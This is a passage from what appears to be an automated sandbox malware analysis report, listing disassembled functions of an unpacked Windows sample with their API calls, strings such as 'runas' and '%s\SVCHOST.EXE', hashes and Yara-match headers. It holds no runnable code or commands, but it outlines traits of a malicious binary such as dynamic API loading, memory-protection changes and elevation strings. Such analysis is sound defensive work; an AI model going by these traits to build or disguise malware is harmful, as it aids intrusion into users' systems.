                          • _memmove.LIBCMT ref: 00406F90
                          • _memset.LIBCMT ref: 00406FE8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentProcess_memmove_memset
                          • String ID: D
                          • API String ID: 3982101328-2746444292
                          • Opcode ID: fa124bb30cdbb1f417195f11095cf570eba08c0846fb746eb5b22adb4fe37978
                          • Instruction ID: da0b9fa1c628436c0729d377d3fc31351201813bcae8fd64a0a4471667014b57
                          • Opcode Fuzzy Hash: fa124bb30cdbb1f417195f11095cf570eba08c0846fb746eb5b22adb4fe37978
                          • Instruction Fuzzy Hash: B6C1E9B1A00318AFDB24CFA4CD49F9EB7B5FB48704F208569F609AB290D775A984CF54
                          Function 0040F470 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 117stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • __snwprintf.LIBCMT ref: 0040F4CC
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040F50F
                          • __snwprintf.LIBCMT ref: 0040F553
                          • _memset.LIBCMT ref: 0040F563
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintflstrlen$_memsetlstrcmpi
                          • String ID: "%s%s" %s$%s%s$D
                          • API String ID: 3486848216-1142567492
                          • Opcode ID: 6591c5d9571cf5afcffaa47041b92443de746e5a4a7dba17e69abd2976a2c285
                          • Instruction ID: 94f9f7d526d00085955fa470010bfdb00b17b91c43c7cc5adbbf959487f6b84e
                          • Opcode Fuzzy Hash: 6591c5d9571cf5afcffaa47041b92443de746e5a4a7dba17e69abd2976a2c285
                          • Instruction Fuzzy Hash: 7C41ADB4A00208BBD714DFA0DC49FAE7779FB48701F50443AF605B66C1DB789A48CB68
                          Function 00423600 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 00423628
                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00423651
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: NTDLL.DLL$RtlGetVersion
                          • API String ID: 2574300362-196638859
                          • Opcode ID: 515c2e0ee8a0e5ba850e9100b05932fa9f56ab70241ada10714002074d93930a
                          • Instruction ID: 58b0ae03d4b459a716950005324cdfb3490182bae94a327c6236c0a64777fc64
                          • Opcode Fuzzy Hash: 515c2e0ee8a0e5ba850e9100b05932fa9f56ab70241ada10714002074d93930a
                          • Instruction Fuzzy Hash: 165104B4A00218EFCB14DF60D988BD9B7B5BB48301F6085A9E909A7350DB789B85DF54
                          Function 00417A39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111threadCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00417ABA
                          • __snwprintf.LIBCMT ref: 00417ADF
                            • Part of subcall function 00407280: _memset.LIBCMT ref: 004072BF
                            • Part of subcall function 00407280: _memset.LIBCMT ref: 0040730A
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417B64
                          • CreateThread.KERNEL32(00000000,00000000,0040BCA0,00000000,00000000,00000000), ref: 00417B87
                          • CloseHandle.KERNEL32(?), ref: 00417BA4
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • CreateThread.KERNEL32(00000000,00000000,0041C690,00000000,00000000,00000000), ref: 00417BD5
                          • CreateThread.KERNEL32(00000000,00000000,00422100,00000000,00000000,00000000), ref: 00417BEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$Thread_memsetlstrlen$__snwprintf$CloseEventHandle
                          • String ID: "%s%s"
                          • API String ID: 3189696634-1694057794
                          • Opcode ID: 9402a5bf2234cc531801f2ad4859e290af130b3bd0802ef8c76280a6f5f20343
                          • Instruction ID: 63a10ece418804601786ab08b0f6251961baafe1328c1c8680ebe09e9a8bf3d6
                          • Opcode Fuzzy Hash: 9402a5bf2234cc531801f2ad4859e290af130b3bd0802ef8c76280a6f5f20343
                          • Instruction Fuzzy Hash: A9416270A88314AFE724AB60AC4BFE53274A715709F10457AF20D692D1D7F869C4CF5E
                          Function 00418508 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,?,0041824B,?), ref: 0041852B
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418563
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418583
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0041824B,?), ref: 0041859B
                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 004185BA
                          • ResumeThread.KERNEL32(00000000), ref: 004185E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 3200977696-2564639436
                          • Opcode ID: e47913d85177d952f07e91ab2c55a93ee882f99a65de917e450145ff4c684f91
                          • Instruction ID: fd4e0360adda180c4f1a786bb116d6f6d9cc44fc05efef3a18d3bfaac9fe992b
                          • Opcode Fuzzy Hash: e47913d85177d952f07e91ab2c55a93ee882f99a65de917e450145ff4c684f91
                          • Instruction Fuzzy Hash: F03118B4A00219EFDB14CF94C888BEEB7B2FB48304F248559E61967390C775A981CF58
                          Function 00425298 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _malloc.LIBCMT ref: 004252B2
                            • Part of subcall function 004256B9: __FF_MSGBANNER.LIBCMT ref: 004256D2
                            • Part of subcall function 004256B9: __NMSG_WRITE.LIBCMT ref: 004256D9
                            • Part of subcall function 004256B9: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00405B83,?), ref: 004256FE
                          • std::exception::exception.LIBCMT ref: 004252E7
                          • std::exception::exception.LIBCMT ref: 00425301
                          • __CxxThrowException@8.LIBCMT ref: 00425312
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                          • String ID: bad allocation$e=A$8@
                          • API String ID: 615853336-2188504570
                          • Opcode ID: efa5a78bcec6c1264fe53b01ca0a315b7082a394095cb23883f6a574b7f84a8e
                          • Instruction ID: 7988b96250c015560cd3d619290e4bc3d25131546947fc9e3d0e9ea9cb753055
                          • Opcode Fuzzy Hash: efa5a78bcec6c1264fe53b01ca0a315b7082a394095cb23883f6a574b7f84a8e
                          • Instruction Fuzzy Hash: BEF0F93161052CAACB04FB56FC0679D77A8AF44728FA4446FE800E61D1CBBD8E458B6C
                          Function 00408DE0 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 241stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 00408F43
                          • lstrcpyW.KERNEL32(00000000,0047B978), ref: 00408F8E
                            • Part of subcall function 00408310: GetLastError.KERNEL32 ref: 0040834C
                            • Part of subcall function 00408310: __snwprintf.LIBCMT ref: 0040838E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ErrorLast__snwprintf
                          • String ID: "%s%s" %s$%s%s$<@@$@@$D$runas
                          • API String ID: 89890705-184178886
                          • Opcode ID: 6778802388b4a04b26f3ca18ba12eaaf2ff7c927a724906eae246c19d0108b67
                          • Instruction ID: e9135c0d80ee49335ed4243af3315bff5dc05c7714a0478ed2a99f7f94b60ec1
                          • Opcode Fuzzy Hash: 6778802388b4a04b26f3ca18ba12eaaf2ff7c927a724906eae246c19d0108b67
                          • Instruction Fuzzy Hash: 8DA12DB0A00218DFEB24DF60DC49B9DB774FB48705F1085AAE60DB6291DB745A88CF69
                          Function 0041F900 Relevance: 10.7, APIs: 7, Instructions: 200memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0041F942
                          • und_memcpy.LIBCMTD ref: 0041F968
                          • und_memcpy.LIBCMTD ref: 0041F983
                          • und_memcpy.LIBCMTD ref: 0041F9B7
                          • VirtualProtect.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0041FBC5
                          • LocalFree.KERNEL32(00000000), ref: 0041FC8B
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                          • String ID:
                          • API String ID: 3065580769-0
                          • Opcode ID: db97eb557d4180286acccdacbb63b56f7b53785f800bb29965c8605d456440a9
                          • Instruction ID: 60fb578c4be36f93d8985b3f4f049626573707d5ff0a196cfa10f70d59769fc2
                          • Opcode Fuzzy Hash: db97eb557d4180286acccdacbb63b56f7b53785f800bb29965c8605d456440a9
                          • Instruction Fuzzy Hash: 05A1C270A056288BDB28CF04CD95BDAB7B1BB88305F1481EAD40DAB354D7396EC6CF84
                          Function 0040F260 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                          Download Yara Rule
                          APIs
                          • _memmove.LIBCMT ref: 0040F28B
                          • __snwprintf.LIBCMT ref: 0040F332
                          • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000000,00000000), ref: 0040F34D
                          • WriteFile.KERNEL32(000000FF,00000000,00000000,?,00000000), ref: 0040F36E
                          • DeleteFileW.KERNEL32(00000000), ref: 0040F3A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateDeleteWrite__snwprintf_memmove
                          • String ID: %s%s
                          • API String ID: 1135641114-3252725368
                          • Opcode ID: 40875bf7252593c87c7f63d1ba15bc5223dc12cf6d8f7c1c20e90b78a65ca814
                          • Instruction ID: e1b8e62fcb98a0169351ce3fd75097269ad8096bf713dfe403c8dd12490f9e03
                          • Opcode Fuzzy Hash: 40875bf7252593c87c7f63d1ba15bc5223dc12cf6d8f7c1c20e90b78a65ca814
                          • Instruction Fuzzy Hash: BE411B75A00209EBDB14DFA4D989FAEBBB5FF48701F104579FA05B7280C778AA44CB58
                          Function 00418276 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(00000000), ref: 004182C7
                          • CloseHandle.KERNEL32(00000000), ref: 004182E7
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004182FF
                          • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 0041831E
                          • ResumeThread.KERNEL32(00000000), ref: 0041834C
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004183A1
                          • CloseHandle.KERNEL32(00000000), ref: 004183CD
                          • CloseHandle.KERNEL32(00000000), ref: 004183ED
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00418405
                          • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 00418424
                          • ResumeThread.KERNEL32(00000000), ref: 00418452
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID: d
                          • API String ID: 738346648-2564639436
                          • Opcode ID: 2a3b5e452e677c21a53d98120e54adf304e48e22d55fefbe41f6c8e64a6de015
                          • Instruction ID: ba0be99f31122c16ebddf1e6e47dfae09c46e12a65730e933a3b4d9d22be5517
                          • Opcode Fuzzy Hash: 2a3b5e452e677c21a53d98120e54adf304e48e22d55fefbe41f6c8e64a6de015
                          • Instruction Fuzzy Hash: AF319374E00208DFDB18CF94C888B9DFBB1BF88705F24C259EA156B395CB75A886CB44
                          Function 0041D850 Relevance: 10.6, APIs: 7, Instructions: 74threadmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 0041D866
                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000004,00000000), ref: 0041D889
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041D8A0
                          • ResumeThread.KERNEL32(00000000), ref: 0041D8DE
                          • CloseHandle.KERNEL32(00000000), ref: 0041D8F2
                          • CloseHandle.KERNEL32(00000000), ref: 0041D90C
                          • LocalFree.KERNEL32(00000000), ref: 0041D916
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleLocalThread$AllocEventFreeResume
                          • String ID:
                          • API String ID: 4097846125-0
                          • Opcode ID: 8231620f3605af58c0a931139f119fd4e7802a4526fdbcce2b5dab214ad60b68
                          • Instruction ID: 96f23212a6419cea9540a98e5d17cd16be6374bc9748ac4717777b420f28046f
                          • Opcode Fuzzy Hash: 8231620f3605af58c0a931139f119fd4e7802a4526fdbcce2b5dab214ad60b68
                          • Instruction Fuzzy Hash: 13215EB9E00208FBDB04DFA4D849BDDB7B4AB48311F208199FA19A7390C734AA40CF58
                          Function 00420160 Relevance: 10.6, APIs: 7, Instructions: 62filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0042017C
                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00420191
                          • LocalAlloc.KERNEL32(00000040,000000FF), ref: 004201A6
                          • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 004201C7
                          • CloseHandle.KERNEL32(000000FF), ref: 004201DD
                          • LocalFree.KERNEL32(00000000), ref: 004201F4
                          • CloseHandle.KERNEL32(000000FF), ref: 004201FE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction ID: 12de7b0313f4499c1902146f5b05111a38b60bb585a5da9353494ef4b19c3374
                          • Opcode Fuzzy Hash: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction Fuzzy Hash: 1A212774A00308FBDB14DBE4DC88BAEB7B8FB88710F108199E625A72D0C674AA40CB54
                          Function 00406930 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf
                          • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE
                          • API String ID: 2391506597-3707798339
                          • Opcode ID: ff38144e36b07f6db76263b73ea45fb743e31a8283e63518e53c945a542f6b1a
                          • Instruction ID: 8d8a976fe95106f2b20d64d823a6b75adf7ba3c6bb1cc1f2bc7a940eae9cbe5c
                          • Opcode Fuzzy Hash: ff38144e36b07f6db76263b73ea45fb743e31a8283e63518e53c945a542f6b1a
                          • Instruction Fuzzy Hash: 1E1146F1700344A7EF00DF90CC86FB73258AB85704F16452AF6165B6C0D6BDD8A1C75A
                          Function 0040C580 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0040C58E
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040C5B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Module$FileHandleName
                          • String ID: KERNEL32.DLL$USER32.DLL
                          • API String ID: 4146042529-2880226457
                          • Opcode ID: f9ff6b7c69088ed18e6cd30b313f6bcd22874cd683d3ae34d823f47e626d093f
                          • Instruction ID: d8326dfa3f95f6af7e2172a4f9426cee28022d40273b6685088d782de763849f
                          • Opcode Fuzzy Hash: f9ff6b7c69088ed18e6cd30b313f6bcd22874cd683d3ae34d823f47e626d093f
                          • Instruction Fuzzy Hash: 4C01A774B54218EFC720DB70CD89BEB76B49708304F2019B6E60AF21C0E279BA449E6D
                          Function 00429161 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C840,00000008,00429269,00000000,00000000,?,?,004283B3,00425742,?,?,00405B83,?), ref: 00429172
                          • __lock.LIBCMT ref: 004291A6
                            • Part of subcall function 0042D7F5: __mtinitlocknum.LIBCMT ref: 0042D80B
                            • Part of subcall function 0042D7F5: __amsg_exit.LIBCMT ref: 0042D817
                            • Part of subcall function 0042D7F5: EnterCriticalSection.KERNEL32(00405B83,00405B83,?,004291AB,0000000D,?,?,004283B3,00425742,?,?,00405B83,?), ref: 0042D81F
                          • InterlockedIncrement.KERNEL32(888D8B31), ref: 004291B3
                          • __lock.LIBCMT ref: 004291C7
                          • ___addlocaleref.LIBCMT ref: 004291E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL
                          • API String ID: 637971194-2576044830
                          • Opcode ID: 9d9a3459f5f0cdfb04b3158e47f20ecdca7376571223b52a922268d22b747446
                          • Instruction ID: 6c66b634a268711a9401fe7bb6153e1dc172c36381796aa83b41a0db6993cb8d
                          • Opcode Fuzzy Hash: 9d9a3459f5f0cdfb04b3158e47f20ecdca7376571223b52a922268d22b747446
                          • Instruction Fuzzy Hash: 48018471940700EFD720AF6AE846749FBF0AF54314F60894FE4D5972A0CBBCAA44CB69
                          Function 00406000 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0040601B
                          • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040602D
                          • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 00406041
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                          • API String ID: 667068680-2897241497
                          • Opcode ID: b5833069ae474c4c5936d1bb37857093b8e160cd104588c0bdb069467e024a18
                          • Instruction ID: 0c6e80d2cd4d852bbcf0d13c32b975f7affc432616e76e6080f0b5a3c05e53ef
                          • Opcode Fuzzy Hash: b5833069ae474c4c5936d1bb37857093b8e160cd104588c0bdb069467e024a18
                          • Instruction Fuzzy Hash: F0F03C76564204FFC714DFA0EC4C7AA7B74A748302F10507EA909922A2C77858C8CF1C
                          Function 004145D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,?,?,0041CC83), ref: 004145D9
                          • GetProcAddress.KERNEL32(0041CC83,RtlDecompressBuffer), ref: 004145EB
                          • GetProcAddress.KERNEL32(0041CC83,RtlGetCompressionWorkSpaceSize), ref: 004145FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                          • API String ID: 667068680-1459209654
                          • Opcode ID: 12eb84a2ad7da26ac98e0bb4dfa6020314f6c907d9ce4db396483fb9dd3fc3f5
                          • Instruction ID: eae89aa9e54ec5fe30aaa5054764df6fa712763fe0a5d5df84310ac6675ccaff
                          • Opcode Fuzzy Hash: 12eb84a2ad7da26ac98e0bb4dfa6020314f6c907d9ce4db396483fb9dd3fc3f5
                          • Instruction Fuzzy Hash: DEF03A74A05204FBD724CBA4E909BA977B4E785706F1015BBE408822B0E678A9C9CA19
                          Function 0041A780 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$GET$application/octet-stream$text/plain
                          • API String ID: 0-1326944966
                          • Opcode ID: e8558670ebd19a465f2cc52b574e65a62a8c73e3c0d5628d88af1ffd4544ecbf
                          • Instruction ID: 3b5f2e9da9426d44645e64c87a8eb70c880a44e6c3c5a92d7912c720405387ee
                          • Opcode Fuzzy Hash: e8558670ebd19a465f2cc52b574e65a62a8c73e3c0d5628d88af1ffd4544ecbf
                          • Instruction Fuzzy Hash: 0BF10F70A00218DFDB14DFA4CD49BEEB7B5FB48704F108599E509AB284D7749AC4CF9A
                          Function 0042216F Relevance: 9.1, APIs: 6, Instructions: 51synchronizationsleepmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004221BA
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042224D
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422270
                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00422288
                          • Sleep.KERNEL32(00000BB8), ref: 004222A1
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004222BB
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004222D3
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00422351
                          • LocalAlloc.KERNEL32(00000040,00000004), ref: 00422368
                          • CreateThread.KERNEL32(00000000,00000000,00422650,00000000,00000000,00000000), ref: 00422394
                          • GetTickCount.KERNEL32 ref: 004223B1
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004223D9
                          • SetEvent.KERNEL32(00000000), ref: 004224C2
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004224CE
                          • CloseHandle.KERNEL32(00000000), ref: 004224E9
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004225A7
                          • SetEvent.KERNEL32(00000000), ref: 004225B8
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004225C4
                          • CloseHandle.KERNEL32(00000000), ref: 004225D4
                          • CloseHandle.KERNEL32(00000000), ref: 004225EB
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$CloseHandle$Event$Create$AllocCountLocalMutexReleaseSleepThreadTick
                          • String ID:
                          • API String ID: 3997620821-0
                          • Opcode ID: d002ee51f2baca840a06b6ab246674f7e9fafdfcbf353304c68a9000ce76f39f
                          • Instruction ID: 06073eb95e3d92e63929033871a363c0ea52abaf58939d7c64c74a1e757a3379
                          • Opcode Fuzzy Hash: d002ee51f2baca840a06b6ab246674f7e9fafdfcbf353304c68a9000ce76f39f
                          • Instruction Fuzzy Hash: BD118E74A04214FFDB54CFE0F94CBAEB7B0FB49301F50846AE20566290C7B85588CF29
                          Function 00428735 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 0042875D
                            • Part of subcall function 00424A47: __getptd.LIBCMT ref: 00424A55
                            • Part of subcall function 00424A47: __getptd.LIBCMT ref: 00424A63
                          • __getptd.LIBCMT ref: 00428767
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 00428775
                          • __getptd.LIBCMT ref: 00428783
                          • __getptd.LIBCMT ref: 0042878E
                          • _CallCatchBlock2.LIBCMT ref: 004287B4
                            • Part of subcall function 00424AEC: __CallSettingFrame@12.LIBCMT ref: 00424B38
                            • Part of subcall function 0042885B: __getptd.LIBCMT ref: 0042886A
                            • Part of subcall function 0042885B: __getptd.LIBCMT ref: 00428878
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          • Opcode ID: 8c81b6205adf69f81b8a27efc814c6f22dcca121137f3e194516562ed428d844
                          • Instruction ID: ff6e657a384014cc070408bc5d47213e9fb4f84d3490c6a2d7023cbb59465c98
                          • Opcode Fuzzy Hash: 8c81b6205adf69f81b8a27efc814c6f22dcca121137f3e194516562ed428d844
